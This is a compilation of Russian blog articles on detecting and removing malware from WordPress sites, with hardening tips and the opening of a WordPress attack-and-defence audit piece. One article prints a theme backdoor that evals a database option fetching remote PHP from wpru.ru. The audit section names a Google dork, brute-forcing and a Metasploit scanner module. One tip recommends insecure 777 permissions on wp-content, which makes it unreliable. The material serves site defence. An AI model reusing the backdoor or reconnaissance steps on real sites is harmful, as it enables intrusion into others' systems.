Определить наличие вируса в теме оформления или в коде плагина очень просто. Если активная тема построена на основе одной из официальных тем, то нужно просто сравнить оригинальный код с кодом проверяемой темы. Для этого скачайте тему по умолчанию, которая входит в дистрибутив WordPress, измените её название и переключите оформление на нее. Остаётся только проверить сгенерированный сервером HTML-код на наличие вируса, и если он обнаружится, то проблема кроется явно не здесь.

Если вредоносный код был найден в файлах активной темы, и при этом были установлены, но не активированы дополнительные темы, то придется проверить и каждую из них, так как, возможно, вирус заражает определенные файлы из каталога themes. Лучше всего использовать только одну тему оформления, а все неактивные удалить.

Поиск вирусов в коде плагинов также не представляет особой сложности. Следует последовательно отключать плагины и проверять генерируемый HTML-код. Таким образом, можно выявить зараженный плагин, удалить его и переустановить из депозитария заново.

Лучшие способы защиты плагинов и тем WordPress:

  • скачивайте и устанавливайте темы и плагины только с проверенных Web-сайтов;
  • не используйте «взломанные» платные плагины и темы;
  • удаляйте неиспользуемые плагины и темы;

Как найти вредоносный код в файлах ядра WordPress

Если вы проверили плагины и темы, но так и не смогли определить источник заражения, то, возможно, он находится непосредственно в файлах ядра WordPress. Заражение ядра может означать, что злоумышленник получил доступ в административную часть сайта, подобрав или перехватив пароль для доступа к Web-сайту по протоколу FTP.

В первую очередь, проверьте на вирусы компьютер, с которого вы заходили на FTP или административный интерфейс Web-сайта. Пароль мог быть украден из вашего компьютера при помощи троянского вируса, который передал конфиденциальные данные злоумышленнику.

Зачастую злоумышленники встраивают в файл .htaccess коды перенаправления, зашифрованные ссылки на вредоносные сценарии, расположенные на удаленных серверах, поэтому первым делом нужно обязательно сравнить этот файл с оригинальным из дистрибутива. Особое внимание нужно обращать на подобные строки:

Это не «полноценный» вирус, а, скорее, набор вредоносных правил, которые воруют у вас посетителей и трафик, перенаправляя пользователей на рекламируемый сайт без вашего ведома, искусственно повышая популярность «паразитирующего» ресурса.

Если подобные строки были обнаружены, то не следует сразу их удалять. Сначала запросите у хостинг-провайдера логи за период примерного изменения файла .htaccess и проанализируйте, с какого IP адреса и когда был отправлен этот файл. Возможно, в это же время были изменены и другие файлы.

Если был изменен только этот файл, то следует сменить пароли для FTP и административного интерфейса. Если же изменения были обнаружены и в *.php, *.html файлах, то, скорее всего, на сайт был загружен PHP-сценарий, через который злоумышленник сможет получить доступ ко всей имеющейся информации.

Профилактика такого вида угроз довольно проста и не требует особых затрат. Важно помнить следующие правила:

  • не храните пароли в FTP-менеджерах или в почтовых сообщениях;
  • регулярно обновляйте ядро WordPress;
  • обновляете плагины и темы;
  • не используйте простые пароли.

Вполне возможно, что вы изначально следовали всем этим правилам, и дело не в уязвимости Web-сайта, а в недостаточной защите самого сервера, на котором располагается ресурс. В таких случаях, отправьте подробное описание проблемы в техническую поддержку хостинг-провайдера и совместно ищите решение проблемы.

Как найти инъекцию вредоносного SQL-кода в WordPress

Итак, мы уже рассмотрели различные способы заражения и лечения Web-сайта, основанного на бесплатной CMS WordPress. Но одним из популярных методов проникновения и взлома является SQL-инъекция (sql injection). Этот способ заражения основан на составлении запроса в базу данных, в котором производится кража пароля от административного интерфейса или получение другой конфиденциальной информации. В отношении WordPress можно сказать, что известные на момент последнего обновления «бреши» в системе безопасности базы данных и в фильтрации запросов, были устранены.

Чтобы уберечься от взлома сайта с помощью SQL-инъекции следует внимательно выбирать плагины, так как они работают с базой данных, а потому недостаточно добросовестный разработчик мог оставить лазейку для злоумышленников. Возможно, в некоторые бесплатные плагины такой скрытый вход интегрируется намеренно. При выборе плагина необходимо руководствоваться не только его возможностями, но и популярностью, а также количеством произведенных установок. Также стоит изучить отзывы, оставленные на странице разработчика. Если у вас появится малейшее сомнение, или же найдётся негативный отзыв, касающийся безопасности, то лучше не рисковать и установить другой плагин с подобной функциональностью.

Большинство CMS построены таким образом, чтобы пользователь с минимальными навыками программирования смог ее установить, настроить, включить один из предложенных видов оформления и начать наполнять Web-сайт необходимой информацией. Поэтому Web-сайты зачастую находятся в руках неопытных администраторов, которые не могут распознать подобное вторжение с помощью SQL-инъекции.

Но плагин WordPress Exploit Scanner, упоминавшийся ранее, умеет работать и с базой данных, и в некоторых случаях он может найти внедренную в базу данных постороннюю функциональность. Вот только удалять ее придется вручную с помощью специальных SQL команд в программе администрирования баз данных PHPMyAdmin. Подобные действия нужно выполнять очень аккуратно, так как неправильный запрос или команда может повредить структуру или содержимое базы данных. Чтобы этого не произошло, стоит заранее озаботиться процессом создания резервных копий БД. Кстати, сам Exploit Scanner может выдавать рекомендации по исправлению SQL-запросов.

Практические способы защиты Web-сайтов, построенных на базе WordPress

В интернете можно найти множество советов о том, как обезопасить и защитить Web-сайт, работающий на бесплатной CMS WordPress. Ниже предлагается список из наиболее эффективных рекомендаций:

  • следует изменить и никогда не использовать стандартные имена для пользователей, имеющих администраторские права, например, admin, administrator и т.д.;
  • необходимо установить капчу, которая существенно снижает риск от взлома путём перебора паролей;
  • для входа в административный интерфейс должен использоваться сложный буквенно-цифровой пароль, не менее 8-10 символов;
  • пароль не стоит хранить в Web-браузере, текстовых файлах и т.д, offline-хранение на листке бумаге гораздо надёжнее;
  • необходимо защищать и пароль почтового ящика, который был указан при установке WordPress;
  • регулярно выполняйте резервное копирование вручную или с помощью специальных плагинов или сторонних программ, при этом полученные резервные копии обязательно должны храниться в нескольких местах;
  • не устанавливайте плагины из неизвестных источников, взломанные платные плагины и темы;
  • следует установить плагины, отвечающие за безопасность файлов и базы данных WordPress, и регулярно проверять состояние сайта с помощью антивируса;
  • вовремя обновляйте ядро, плагины и темы (перед каждым обновлением обязательно делайте полное резервное копирование);
  • файл admin.php стоит переименовать, чтобы затруднить его идентификацию;
  • зарегистрируйте Web-сайт в Яндекс или Google, чтобы быть в курсе проблем, связанных с безопасностью сайта и его индексацией;
  • необходимо проверить права для каталогов и файлов WordPress: для каталогов выставляются права 755, для всех файлов 644, отдельно для каталога wp-content права должны быть 777;
  • если нет необходимости в регистрации пользователей, то лучше эту функцию отключить совсем;
  • также можно отключить возможность комментирования и оставить только форму для комментирования через социальные сети;
  • следует удалить файл readme.htm, расположенный в корневом каталоге, в котором хранятся сведения об установленной версии WordPress (это надо делать после каждого обновления CMS);
  • также упоминание об используемой версии WordPress следует удалить из файла functions.php, добавив туда строчку:
Мастер Йода рекомендует:  Как получить ответ на свой вопрос наиболее важные аспекты использования Stack Overflow, необходимые

Что делать если проблему так и не удалось решить?

Безвыходных ситуаций не бывает. Может казаться, что вы перепробовали абсолютно все способы обезвреживания вирусного кода или скрытых рекламных ссылок. Возможно, что Web-сайт перестал работать после неудачного лечения от вирусов, и вы уже не в состоянии восстановить его работу. Не отчаивайтесь, а попробуйте обратиться к специалистам, которые за плату помогут восстановить Web-сайт и дадут советы, как улучшить его безопасность и работоспособность. Можно написать в техподдержку WordPress, найти ответ в WordPress Codex или задать вопрос на официальном форуме.

В случае если вы избавились от вирусов, правильно настроили плагины, отвечающие за безопасность, поменяли пароли, а через некоторое время ситуация повторилась вновь, то следует рассмотреть вопрос смены хостинг провайдера. Скорее всего, серверы, на которых расположен Web-сайт, плохо защищены или неправильно настроены.

Заключение

Большинство представленных советов останутся актуальными еще очень долго, так как они относятся не только к WordPress, но и к любым Web-сайтам, независимо от используемой платформы. Интернет стремительно развивается, постоянно появляются новые обновления и пишутся новые вирусы, закрываются пробелы в безопасности CMS и различных сервисов. Шагайте в ногу со временем, регулярно модернизируйте и обновляйте Web-сайт, и тогда вы сможете избежать подобных чрезвычайных ситуаций.

7 способов проверить сайт на вирусы, вредоносные ссылки и прочую нечисть + 3 полезных плагина для WordPress

Привет, друзья IdeaFox!

Не знаю, как вы, а я вот плохо по ночам сплю. Мучают меня вопросы безопасности блога. Сил уже нет никаких : – )

Перечитал кучу блогов на эту тему и протестировал много плагинов, которые помогают решить эту проблему. Да и в комментариях стали задавать вопросы по теме защиты сайта, что и подтолкнуло меня написать эту заметку.

Вот представьте себе, что Вы ведете блог, пишите статьи, стараетесь… И приходят злые мудаки, которые ломают ваш сайт. Думаю, что огорчений будет очень и очень много.

Ведь каждый нормальный блоггер вкладывает очень много времени и сил в развитие своего сайта. А для многих блоггинг вообще становится навязчивой идеей… Тут и до психушки рукой подать, если ТАКОЕ случится : – )

Ну, вы поняли, насколько это важно.

Перейдем к делу, наконец: )

Пару месяцев назад я уже писал заметку про то, как нужно защитить свой блог от взлома. Обязательно прочтите ее. Но с тех пор прошло довольно много времени и я принял дополнительные меры по усилению круговой обороны.

В следующих заметках я обязательно подробно остановлюсь на этом вопросе. (Про настройку ISP тоже помню и пишу)

Подписывайтесь на обновления и вы не пропустите эту заметку.

Что нужно сделать перед защитой блога?

Вообще, прежде чем заняться вопросом усиления защиты, нужно полностью проверить блог на наличие вирусов, вредоносных ссылок и прочих ночных кошмаров любого блогера : – )

Довольно глупо укреплять оборону уже взломанного блога. Так ведь?

Поэтому, нужно всесторонне проверить свое хозяйство перед укреплением блога от вторжений тех самых мудаков.

Сегодня расскажу как сам решал эту задачу максимально простым языком.

1. Просканируйте свой компьютер на вирусы

Множество заражений блогов происходит через компьютеры пользователей, которые имеют доступ к админке сайта и хостингу.

Поэтому просканируйте сначала свой компьютер. Благо, бесплатных антивирусов сейчас полно.

Не рекомендуются хранить пароли в FTP-клиентах и браузерах. Понятно, что все пароли не упомнить, но тем не менее.

Лично я отказался от Opera в пользу Google Chrome. FTP-клиентами уже давно не пользуюсь, так как не клепаю бложики в промышленных масштабах : – )

2. Проверяем сайт в панелях вебмастера:

Надеюсь, Ваш сайт уже занесен в Яндекс.Вебмастер. Если да, то идем в меню “Безопасность” и ждем заветную надпись “Вредоносный код на сайте не обнаружен”

Аналогичную операцию делаем в Инструментах для веб-мастеров от Гугл

Нужно просто зайти в пункт меню “Состояние – Вредоносные программы” и прочитать сообщение.

Естественно, Ваш сайт тоже должен быть добавлен в “Инструменты для веб мастеров”

3. Проверяем сайт на других онлайн-сервисах

Таких сервисов развелось видимо-невидимо. У меня сложилось стойкое мнение, что многие из них совершенно бестолковые и созданы исключительно для показа рекламы.

Но вот что могу порекомендовать:

Доктор Веб

Компания DR.Web cделала хороший сервис для проверки сайтов он-лайн. Лично мне он помог один раз найти заразу у друга на блоге (Был сторонний код в файле .htaccess)

Проверка очень простая. Вносим свой URL и ждем результат проверки.

antivirus-alarm.ru

Мощный сканер сайтов, который использует аж 43 антивирусные базы от ведущих антивирусных компаний мира.

Тут тоже все очень просто. Вбиваем URL своего сайта и с замиранием сердца ждем результатов сканирования.

Вот я дождался таких.


Все чисто, можно спать спокойно : – )

Все это конечно хорошо, но нужно еще и установить пару плагинов, которые совсем не помешают для WordPress-блогов.

4. Попросите хостера проверить Ваш сайт

Дело в том, что хостеры еще больше вас обеспокоены вопросами безопасности и располагают мощными средствами защиты. Причем специализированными средствами защиты.

Например, после переезда на VPS от МакХост получил довольно мощный сканер, которым пользуюсь регулярно.

5. Плагин для WP Theme Authenticity Checker (TAC)

Здесь стоить отметить, что люди никак не поймут, что к бесплатным шаблонам нужно относиться крайне осторожно. Очень высока вероятность хватануть дерьма (извините), устанавливая красивую тему с очередной файлопомойки.

Друзья, ну неужели Вам жалко порядка 20 долларов на нормальную платную тему?

Кстати, я сам особо не заморачивался и сделал шаблон в программе Artisteer. Да, у меня ужасный код шаблона, но я точно знаю, что он не содержит всякой дряни, так как делал его сам.

И, честно говоря, не спешу менять “дизайн” : – ) сайта на другой. Меня он устраивает и, тем более, кардинальная смена шаблона может привести к проседанию посещаемости. Короче, менять ничего не буду пока.

Так вот, этот простой плагин позволяет проверить шаблон на наличие сторонних ссылок.

Устанавливается он обычным способом, активируете и идете в пункт меню админки “Внешний вид – TAC”

Плагин немного задумается и показывает результат проверки.

Если видите зеленый квадратик и надпись “Theme OK”, то еще меньше поводов для того чтобы проспаться по ночам в холодном поту : – )

Если же шаблон содержит ссылку на сайт разработчика, то ее можно удалить из кода темы. Но здесь уже придется повозиться. Например, стандартная тема WP содержит ссылку на WordPress team, которую можно удалить.

Скажу сразу, что не видел, как этот плагин реагируют на зараженные темы вордпресс, так как не было такой беды. (тьфу три раза!)

Кстати, у меня есть тестовый блог, на котором всегда проверяю плагины, прежде чем их использовать на “боевом” сайте.

И вам советую не проводить эксперименты на том блоге, которым дорожите. И обязательно делайте резервные копии перед любыми изменениями на своем проекте.

6. AntiVirus для WordPress

Отличный способ для проверки шаблонов на сторонний код. Опять устанавливаем стандартным образом и активируем.

Затем идем в пункт меню “Параметы-Antivirus” и жмем на кнопку “Scan the theme templates now”

Ждем пару минут, пока идет проверка и любуемся пока прямоугольники не закрасятся в зеленый цвет

Обратите внимание, что можно включить ежедневное сканирование шаблона на предмет внедрения стороннего кода с оповещением на указанный е-майл. Удобно.

Любопытно, что одну строчку кода из шаблона от Artisteer он посчитал подозрительной. Но после проверки исходного шаблона, я понял, что это не проблема и внес эту строчку в список исключений (там есть такая возможность)

7. Плагин Exploit Scanner

И, наконец, расскажу про самый мощный способ, который уже для продвинутых пользователей. Если Вы не разбираетесь в тонкостях PHP (как я), то лучше с ним не связываться.

Это настоящая мечта параноика, так как этот плагин настолько подозрителен, что ставит все под сомнение : – ). Например, он считает опасным код роликов от YouTube, Vime, комментарии…

Но, если есть проблема, то он действительно поможет разобраться что к чему.

Когда у меня возникла проблема с первым моим бложиком (мир его праху), то простым сравнением кода с чистой установкой WP, я довольно быстро нашел вредоносный код в одном из плагинов. Пришлось повозиться, конечно и глаза покраснели, но нашел заразу.

Что делать, если нашелся сторонний код?

Лично я обратился бы к профи. Если не знаете, что делать и нет резервных копий, то лучше приготовиться платить профи.

У вас же не возникнет чудесная идея самому себе делать операцию на больном сердце кухонным ножом? : – )

В конце – концов, можно обратиться за помощью к хостинг-компании, где находится Ваш ресурс. Почему бы и нет? Они ведь тоже имеют интерес держать безопасность на нормальном уровне….

Ну а я предпочитаю заранее делать резервные копии и принимать все меры по обороне ЗАРАНЕЕ.

И, естественно, периодически мониторить состояние блога теми способами, о которых рассказал выше.

Что еще можно сделать?

У меня есть видеоурок по безопасности, который рекомендую посмотреть, и все станет понятно.
Этот урок входит в бесплатный курс «Надежный блог за один вечер» и полную версию курса можно получить на этой странице.

Вот такие у меня новости для Вас сегодня. Дальше я расскажу про очень мощный плагин, который позволяет существенно защитить ваш ВордПресс блог от взлома.

Я уже работаю с ним 2 месяца и очень им доволен. Пока разобрался с ним 3 раза сам себя забанил : – ) Короче, есть что рассказать.

Ну а вы что делаете для защиты своих блогов? Есть секреты, которые не знает старик IdeaFox?

Как удалить вирус или вредоносный код из WordPress?

Как одна из наиболее популярых платформ, WordPress время от времени подвергается атаке троянами, внедрением вредоносного кода и т.п.

Существует несколько статей о безопасности сайтов, созданных при помощи WordPress. В них так же содержится информация и о том, как очистить ваш ресурс от вредоносного ПО. Данная тема настолько актуальна и критична, что постоянное её обсуждение не только не навредит, но и пойдёт на пользу хозяевам различных сайтов.

Новички в создании сайтов, кто только начал использовать для работы различные CMS, довольно-таки не слабо пугаются, когда обнаруживают что их ресурс подвергся атаке вирусов. Пытаясь восстановить нормальную работу проектов, они совершают различные ошибки, что в итоге усугубляет ситуацию и в ряде случаев приводит к потере данных или необходимых файлов. В данной статье мы расскажем вам о том, как изучить актуальные угрозы, обнаружить их и очистить сайт от вирусов, не навредив тем самым вашим данным и контенту.

Делайте резервные копии регулярно!

До того, как мы начнём дискуссии по поводу взлома ВордПресс, крайне необходимо обсудить создание резервных копий. Если вы пользуетесь WordPress и планируете иметь большое количество посетителей, вы просто обязаны заиметь привычку регулярно создавать резервные копии блога. Сохраняйте весь контент, настройки и базы данных, чтобы иметь возможность полностью восстановить все файлы. Это не займёт много времени, зато поможет избежать серьёзных проблем в будущем.

Что лучше: восстановление сайта или своевременное обнаружение вируса?

Если вы используете определённые утилиты для создания резервных копий, к примеру, вы имеете возможность вернуть проект к первоначальному состоянию. Но, тем не менее, думаю, что это не очень хорошая идея. Используя преимущество создания резервных копий, без поиска и удаления вредоносного кода, не поможет решить проблему, ваш сайт всё так же останется в уязвимом состоянии. Так что лучшим решением будет найти вирус, избавиться от него, восстановить сам сайт и в последствии закрыть уязвимость.

Обнаружение вредоносного программного обеспечения

Вредоносное ПО – это контент, распространяющийся с намерением навредить или же получить ваши персональные данные. Данный вредоносный код может быть подменён либо вставлен в элементы оформления, плагины, файлы или базу данных. Если сайт был взломан, вредоносное программное обеспечение может попасть и на компьютеры посетителей, перенаправляя их на различные ресурсы, так же содержащие другие вирусы, или же просто открывать необходимые сайты через фреймы с вашего сайта. На данный момент существует много различных вариаций взлома, как вордпресс движков, так и любых остальных сайтов.

Поиск заражённых страниц

Вы можете начать поиск, просматривая страницы на наличие вредоносного кода злоумышленников.

  • Виден ли он на всех страницах?
  • Появляется ли он на определённых страницах или сообщениях?
  • Где именно появляется вредоносный код? Находится ли он в нижней сноске, в оглавлении страницы, где-то в контенте или же в боковой колонке?

Ответы на данные вопросы подскажут вам, где именно искать проблему.

Проверьте элементы дизайна и плагины на наличие вредоносного кода

Наиболее часто заражаемыми объектами бывают темы оформления и плагины. Поиск кода вы можете начать с того, что проверите активную тему (используемую сейчас) на наличие вредоносного кода. Если у вас добавлены какие-то либо темы, кроме стандартной, проверьте каждую из них.

Самым простым способом проверки является копирование на локальный компьютера резервной копии всей директории с темами оформления, затем удаление всей папки с темами с вашего сервера. Затем, скачайте с официального источника стандартную тему оформления для WordPress под названием TwentyEleven и загрузите её на сервер. После завершения всех процедур проверьте сайт – если код злоумышленников исчез, значит, проблема была в одной из тем оформления.

Теперь, вы сможете найти вредоносный код в старой папке тем оформления, поочерёдно открывая каждую из них в текстовом редакторе. Пролистывая код, вы можете заметить подозрительно выглядящую его часть и избавиться от неё. Существует так же и более лёгкий вариант – вы можете просто скачать новую копию активной темы оформления с сайта разработчиков.

Представим себе такой вариант событий, что вы не смогли найти вирус в ваших шаблонах. Тогда, следующим шагом будет поиск его в используемых вами плагинах. В данном случае подойдёт тот же метод, что используется в случае с темами оформления.

Создайте резервную копию подключаемых плагинов на локальном компьютере, при этом удалив их с сервера. Далее проверьте ваш сайт на наличие вредоносного программного обеспечения, не исчез ли он. Если проблема решена, значит, она была в одном из ваших плагинов. Скачайте свежие копии плагинов, что у вас были и поочерёдно подключите их. В том случае, если вирус снова появился после загрузки и установки новых копий, удалите заражённый плагин с вашего сервера.

Лучшие способы обезопасить ваши темы оформления и плагины:

  1. Удалите неиспользуемые плагины и темы оформления.
  2. Убедитесь, что скачиваете темы и плагины из надёжного источника.
  3. Постоянно скачивайте обновлённые версии используемых тем и плагинов.
  4. Не используемые скачиваемые с различных торрентов и неофициальных сайтов темы оформления и плагины.

Как обнаружить вредоносный код, вшитый в сам WordPress:

Если вы проверили темы оформления и используемые вами плагины, а заражение всё ещё присутствует на вашем сайте, следующим шагом будет проверка основных файлов WordPress. И снова тут поможет способ, применяемый в случаях с темами и плагинами.

Прежде всего, создайте резервную копию всех необходимых файлов (к примеру, файла wp-config, папку wp-content, а так же файлы .htaccess и robots.txt). После этого удалите все файлы с сервера, скачайте новый архив движка и загрузите его на сервер. Заполните файл wp-config необходимой информацией. После этого проверьте сайт на наличие вирусов, если они исчезнут, значит, проблема была в самом портале – были заражены основные файлы движка. Восстановите из резервной копии необходимый контент: изображения, различные видео или аудио файлы.

Как защитить от заражения основные файлы WordPress:

  1. Убедитесь, что права доступа 644 установлены на все файлы.
  2. Не изменяйте и не перемещайте основные файлы.
  3. Везде используйте лишь сложные пароли — на FTP, Базу данных, WordPress и т.д.

Как обнаружить узявимость в базе данных WordPress:

Следующим шагом будет проверка баз данных. Прежде всего, удостоверьтесь в том, что вы имеете резервную копию базы данных. Если вы регулярно создаёте резервные копии, вы можете быстро и без проблем восстановить его в первоначальный вид, но первое, что вам нужно сделать, это убедиться в том, что уязвимость находится именно в базе данных.

Скачайте и установите плагин для поиска эксплоитов Exploit Scanner. Запустите плагин и просканируйте сайт. Плагин для поиска эксплоитов просканирует вашу базу данных, основные файлы портала, плагины и темы оформления на наличие подозрительного кода и при окончании сканирования выдаст результаты. Как только сканирование закончится, вам нужно будет пробежаться взглядом по результатам. В отчете о сканировании вы обнаружите большое количество ложных угроз и предупреждений, так что читайте журнал медленно и внимательно. Сканер не удаляет ничего, так что как только вы найдёте вредоносный код, вам будет необходимо вручную удалить его с базы данных.

  • Если вы не создавали резервную копию базы данных ранее, сделайте это, даже если ваш сайт подвергся атаке и был заражён.
  • Иметь базу данных с заражением в любом случае лучше, чем вообще не иметь резервных копий.

Скопируйте подозрительно выглядящий код из журнала сканирования, если таковой обнаружил сканер эксплоитов, и выполните запрос через mysql, как будто сайт работает в штатном режиме и данный запрос был сделан через phpmyadmin.

Исходя из того, куда вставлен подозрительный код, например это статьи, комментарии или какие-то либо разделы, вам нужно будет вставить его в только что созданную базу данных и посмотреть, что же в итоге выйдет. Если в результатах сканирования не так много подозрительных моментов, можете смело редактировать поля вручную, удаляя ненужный код. В другом случае, если в базе данных присутствует слишком большое количество подозрительного кода, вы возможно захотите воспользоваться опцией Найти и Заменить, но данный способ довольно-таки опасен, и если вы не уверены – существует риск потери важных данных.

Прошлись по всем пунктам, и у вас закончились идеи, где искать проблему?

Я думаю, что большинство людей может с лёгкостью обнаружить, изучить и удалить вирус, если их сайт, подвергся атаке и был заражён. Но, тем не менее, обнаружить вирус в определённых случаях бывает довольно таки сложно. На тот случай, если вы перепробовали все описанные выше способы и так не смогли найти, в чем именно проблема, вы всегда можете обратиться к экспертам по безопасности WordPress – которые с лёгкостью могут очистить ваш сайт от вирусов за определённую плату.

Поиск наиболее подходящего специалиста по безопасности по продукции компании WordPress

Существует множество сайтов, посвящённых фрилансингу, где вы можете предложить вознаграждение за помощь в решении проблемы. Перед окончательным выбором кандидатуры обратите внимание на отзывы и награды, которые он получил, и выберите самого опытного и компетентного. Так же вы можете разместить предложения на популярных SEO-форумах или биржах фриланса. Обязательно убедитесь в том, что нанимаемый вами человек имеет хорошую репутацию, отзывы и опыт работы.

Заключение

Сайты на WordPress защищены настолько, насколько это возможно. Как владелец сайта вы обязаны следить за состоянием сайта, использовать самые современные методы для защиты от возможных угроз. Используйте сложные пароли, регулярно проверяйте права доступа и создавайте резервные копии, своевременно очищайте сайт от лишней информации.

Бесплатный шаблон? Проверьте безопасность своего сайта

Привет друзья. Вы уверены, что бесплатный шаблон WordPress, который вы используете для своих сайтов и блогов действительно безопасный и не содержит скрытых угроз и вредоносного кода? Вы полностью в этом уверены? Абсолютно?)


Думаете, прогнали шаблон через плагин TAC, удалили из него скрытые ссылки, и дело сделано. Файлы сайта сканируете периодически антивирусом, заглядываете в инструменты вебмастера Яндекса во вкладку Безопасность и с облегчением видите там сообщение: «Вредоносный код на сайте не обнаружен«.

Вот и я так думал. Не хотел бы вас расстраивать, но…

Скрытый опасный код в бесплатных шаблонах WordPress

Вот такое письмо я получил на прошлой неделе на почту от своего хостинга. С недавних пор они ввели регулярную проверку всех файлов сайта на поиск вредоносного содержания и таки они это содержание у меня обнаружили!

Мастер Йода рекомендует:  Вывод сообщений пользователю в веб-приложениях. PHP

Началось все с того, что я зашел как-то днем на свой сайт и не смог его запустить — вылезала ругательная надпись про не найденные файлы с расширением php. Немного напрягшись пошел изучать содержимое папки с сайтом на хостинге и сразу же обнаружил проблему — мой файл шаблона fuctions.php был переименован в functions.php.malware что как бы неоднозначно намекало — здесь поработал антивирус или что-то вроде этого) Зайдя на почту я и обнаружил вышеупомянутый отчет от хостера.

Первым делом я конечно же начал проверять данный файл, изучал его содержимое, сканировал всевозможными антивирусами, десятками онлайн сервисов по проверке на вирусы и т.д. — в итоге ничего не обнаружил, все в один голос утверждали что файл совершенно безопасный. Я разумеется выразил свои сомнения хостеру, мол вы чего-то напутали, но на всякий случай попросил их предоставить отчет об обнаружении вредоносного куска кода.

И вот что они мне ответили

Пошел гуглить инфу о данном коде и серьезно задумался…

Как найти фрагмент вредоносного кода в шаблоне

Как оказалось, это действительно нетривиальный прием, который позволяет заинтересованным лицам передавать данные на ваш сайт и изменять содержимое страниц без вашего ведома! Если вы используете бесплатный шаблон, то настоятельно рекомендую проверить свой functions.php на наличие следующего кода:

add_filter(‘the_content’, ‘_bloginfo’, 10001);
function _bloginfo($content) <
global $post;
if(is_single() && ($co=@eval(get_option(‘blogoption’))) !== false) <
return $co;
> else return $content;
>

Даже с моими весьма неглубокими познаниями в php видно, что создается некий фильтр, привязываемый к глобальной переменной post и content отвечающие за вывод контента только на страницах записей блога (условие is_single). Уже подозрительно не так ли? Ну а теперь посмотрим что же такого собирается выводить данный код у нас на сайте.

Интересная опция blogoption запрашиваемая в базе данных так же выглядит весьма подозрительной. Заходим в нашу базу данных MySQL и находим там таблицу под названием wp_options, если вы не меняли префиксы то она так будет выглядеть по умолчанию. И в ней находим заинтересовавшую нас строку под названием blogoption

Какая красота! Мы видим следующую опцию

[php]
return eval(file_get_contents(‘http://wpru.ru/aksimet.php? > >
[/php]

Т.е. нам с некого сайта (причем русского заметьте) возвращают содержимое, которое может нести в себе все что угодно! Любое количество ссылок, вредоносные коды, измененный текст и т.д. Сам сайт при заходе на него выдает 403 ошибку доступа, что не удивительно. Разумеется данную опцию я тоже удалил из БД.

По информации от пострадавших обычно возвращается точно такое содержимое вашей статьи с одной лишь модификацией — вместо какой-либо точки «.» в текст маскировалась открытая ссылка! И кстати, данная опция записывается в базу данных при установке самого шаблона, а затем код, который это делает благополучно самоуничтожается. И вот с такой дрянью я жил два года, и ни один антивирус или сервис мне так и не выявил данную угрозу за все то время. Честно говоря я не замечал, срабатывал ли когда-нибудь со мной такой прием, или же эту возможность блокировал мой плагин безопасности (а может одно из обновлений WordPressa закрыло эту дыру), но все равно неприятно.

Мораль про бесплатный сыр

Как вам изощренность наших «переводчиков» шаблонов (или тех кто выкладывает их у себя в каталогах)? Это вам не ссылки из футера выпиливать) Жалко я уже не помню, откуда я скачивал свой шаблон, давно это было, а то бы обязательно пару ласковых написал. И если бы на тот момент обладал тем же опытом, что имею сейчас, то однозначно не пользовался бы бесплатным шаблоном, или на крайний случай не качал бы с неизвестных источников!

Проще купить какой-нибудь официальный премиум шаблон за 15-20 баксов на том же Themeforest и жить спокойно, зная что в нем нет дырок и зашифрованных ссылок, а если даже и найдутся уязвимости, то разработчики обязательно выпустят обновление, в котором эти дырки закроют. ( У Артема artabr кстати недавно вышла статья, где он как раз про премиум шаблоны рассказывает и даже раздает промокоды на зверские скидки, кому интересно )

Под прессом. Ломаем и защищаем WordPress своими руками

WordPress — это удобная блог-платформа для публикации статей и управления ими, на которой базируется огромное число различных сайтов. Из-за своей распространенности эта CMS уже давно является лакомым куском для злоумышленников. К сожалению, базовые настройки не обеспечивают достаточного уровня защиты, оставляя многие дефолтные дырки незакрытыми. В этой статье мы пройдем типичным путем «типового» взлома сайта на WordPress, а также покажем как устранить выявленные уязвимости.

Введение

На сегодняшний день WordPress среди систем управления контентом популярнее всего. Его доля составляет 60,4% от общего числа сайтов, использующих CMS-движки. Из них, согласно статистике, 67,3% сайтов базируется на последней версии данного программного обеспечения. Между тем за двенадцать лет существования веб-движка в нем было обнаружено 242 уязвимости различного рода (без учета уязвимостей, найденных в сторонних плагинах и темах). А статистика сторонних дополнений выглядит еще печальней. Так, компания Revisium провела анализ 2350 русифицированных шаблонов для WordPress, взятых из различных источников. В результате они выяснили, что более половины (54%) оказались зараженными веб-шеллами, бэкдорами, blackhat seo («спам») ссылками, а также содержали скрипты с критическими уязвимостями. Поэтому устраивайся поудобней, сейчас мы будем разбираться, как провести аудит сайта на WordPress и устранить найденные недостатки. Использовать будем версию 4.1 (русифицированную).

Индексирование сайта

Первым этапом любого теста обычно бывает сбор информации о цели. И тут очень часто помогает неправильная настройка индексирования сайта, которая позволяет неавторизованным пользователям просматривать содержимое отдельных разделов сайта и, например, получить информацию об установленных плагинах и темах, а также доступ к конфиденциальным данным или резервным копиям баз данных. Чтобы проверить, какие директории видны снаружи, проще всего воспользоваться Гуглом. Достаточно выполнить запрос Google Dorks типа site:example.com intitle:«index of» inurl:/wp-content/. В операторе inurl: можно указать следующие директории:

Если сможешь просмотреть /wp-content/plugins/, следующий шаг по сбору информации об установленных плагинах и их версиях значительно упрощается. Естественно, запретить индексирование можно с помощью файла robots.txt. Так как по умолчанию он не включен в установочный пакет WordPress, его необходимо создать самому и закинуть в корневую директорию сайта. Мануалов по созданию и работе с файлом robots.txt довольно много, поэтому оставлю эту тему для самоподготовки. Приведу лишь один из возможных вариантов:

Если в файлах, хранящихся в папке uploads, имеются сведения конфиденциального характера, добавляем к этому списку строчку: Disallow: /wp-content/uploads/. С другой стороны, в файле robots.txt не рекомендуется размещать ссылки на директории, которые были созданы специально для хранения чувствительной информации. Иначе этим самым ты облегчишь злоумышленнику задачу, так как это первое место, куда обычно все заглядывают в поисках «интересненького».

Определение версии WordPress

Еще один важный шаг — идентификация версии CMS. Иначе как подобрать подходящий сплоит? Существует три быстрых способа для определения используемой на сайте версии WordPress:

1. Найти в исходном коде страницы. Она указана в метатеге generator: /> или же в тегах :
.
2. Найти в файле readme.html (рис. 1), который входит в состав установочного пакета и находится в корне сайта. Файл может иметь и другие названия типа readme-ja.html.
3. Найти в файле ru_RU.po (рис. 2), который входит в состав установочного пакета и расположен по адресу /wp-content/languages/: «Project-Id-Version: WordPress 4.1.1\n».

Рис. 1. Версия WordPress в файле readme.html

Рис. 2. Подсматриваем версию WordPress в файле ru_RU.po

Один из вариантов защиты в данном случае — ограничить доступ к файлам readme.html и ru_RU.po с помощью .htaccess.

Автоматизация процесса тестирования

Исследованием безопасности WordPress занялись не вчера, поэтому существует достаточное количество инструментов, позволяющих автоматизировать рутинные задачи.

— определение версии и темы с помощью скрипта http-wordpress-info

— подбор пароля по словарям

— модуль для определения версии: auxiliary/scanner/http/wordpress_scanner;
